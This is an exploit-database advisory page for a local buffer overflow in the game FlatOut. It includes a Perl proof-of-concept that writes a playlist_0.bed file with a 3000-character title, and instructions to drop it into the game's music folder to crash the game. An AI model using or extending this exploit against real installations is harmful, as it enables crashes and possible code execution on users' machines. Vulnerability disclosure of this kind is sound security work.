FlatOut Malformed .bed file Buffer Overflow

2012.09.23
Credit: Silent Dream
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#Exploit Title: FlatOut Malformed .bed file Buffer Overflow # Date: 11-29-11 # Author: Silent Dream # Software Link: http://www.gog.com/en/gamecard/flatout # Version: Latest # Tested on: Windows 7 #Tested on GOG.com copy of FlatOut. Exception offset = 61616161 #Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list.. my $file = "playlist_0.bed"; my $head = "Title = \""; my $junk = "a" x 3000 . "\"\r"; my $tail = "Loop = {" . "\r}"; open($File, ">$file"); print $File $head.$junk.$tail; close($FILE); print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";

Referencje:

http://xforce.iss.net/xforce/xfdb/71578


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top